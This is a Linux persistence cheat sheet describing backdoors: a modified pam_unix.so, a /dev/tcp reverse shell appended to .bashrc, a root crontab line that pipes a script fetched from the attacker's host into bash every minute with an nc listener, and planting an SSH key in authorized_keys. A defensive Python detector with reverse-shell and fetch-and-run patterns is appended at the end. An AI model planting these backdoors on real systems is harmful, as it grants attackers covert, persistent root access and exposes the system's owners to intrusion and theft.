INFO
A backdoor is any method by which authorized or unauthorized users bypass the normal security measures and gain high-level user access (root access) on a computer system, network or software application. Backdoors are designed to be discreet: they exist so that a select group of people who know about them can regain easy access to a system or application.
PAM
INFO
This backdoor consists of modifying the pam_unix.so module so that it also accepts a password of your own.
pam_unix.so is the PAM module responsible for password authentication.
pam_unix.so uses the unix_verify_password function to verify the user's supplied password :
.bashrc
INFO
If a user has bash as their login shell, the ".bashrc" file in their home directory is executed each time an interactive session is launched.
For a user that logs in often, append a reverse shell to their .bashrc :
echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc
- Start a nc listener on the attacker machine
CronJob
Requires root access
INFO
system crontab file → /etc/crontab
- Configure a task so that every minute a reverse shell is sent back to you. Add this line to the crontab file :
* * * * * root curl http://$attacker_ip:8080/shell | bash
- Add this to the shell file :
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
- On the attacker machine :
nc -nvlp $port
SSH
INFO
Consists of adding our ssh public key to some user's home directory, so that we can then log in as that user via ssh.
Generate ssh key
ssh-keygen
Add our public key to the user's .ssh/authorized_keys
# if no .ssh directory -> create it
mkdir -p .ssh
cat id_rsa.pub >> .ssh/authorized_keys
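As an added defender's example (not part of this cheat sheet), a small Python checker that looks for each of the four persistence techniques above on sample input: reverse-shell lines in .bashrc, cron entries that pipe a download into bash, authorized_keys entries outside an allow-list, and a pam_unix.so whose SHA-256 no longer matches the packaged digest. The sample .bashrc, crontab and key strings are constructed, and 192.0.2.10 is a documentation address.

```python
import hashlib
import re

# Indicators for the techniques on this page: a reverse shell appended to
# .bashrc and a cron line that pipes a downloaded script into a shell.
REVERSE_SHELL = re.compile(r"/dev/tcp/\S+|\bnc\b[^|]*-e\s*/bin/(ba)?sh")
FETCH_PIPE_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba)?sh\b")

def scan_shell_text(text, source):
    """Return (source, line_no, tag, line) for each suspicious line."""
    hits = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments are never executed
        if REVERSE_SHELL.search(line):
            hits.append((source, no, "reverse_shell", line))
        if FETCH_PIPE_SHELL.search(line):
            hits.append((source, no, "fetch_pipe_shell", line))
    return hits

def unexpected_keys(authorized_keys, allowed_keys):
    """Public keys in an authorized_keys file that are not on the allow-list."""
    allowed, found = set(allowed_keys), []
    for raw in authorized_keys.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        for i, tok in enumerate(parts[:-1]):  # skip any options prefix
            if tok.startswith(("ssh-", "ecdsa-", "sk-")):
                key = tok + " " + parts[i + 1]
                if key not in allowed:
                    found.append(key)
                break
    return found

def pam_module_modified(module_bytes, packaged_sha256):
    """True when pam_unix.so no longer matches the digest from its package."""
    return hashlib.sha256(module_bytes).hexdigest() != packaged_sha256

# Constructed samples modelled on the lines of this page; 192.0.2.10 is a
# documentation address, not a real host.
SAMPLE_BASHRC = "alias ll='ls -l'\nbash -i >& /dev/tcp/192.0.2.10/4444 0>&1\n"
SAMPLE_CRONTAB = ("* * * * * root curl http://192.0.2.10:8080/shell | bash\n"
                  "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n")

if __name__ == "__main__":
    print(scan_shell_text(SAMPLE_BASHRC, "~/.bashrc"))
    print(scan_shell_text(SAMPLE_CRONTAB, "/etc/crontab"))
```

On a real host the expected pam_unix.so digest comes from the package manager (for example `rpm -V pam` or `debsums libpam-modules`) rather than a hard-coded value.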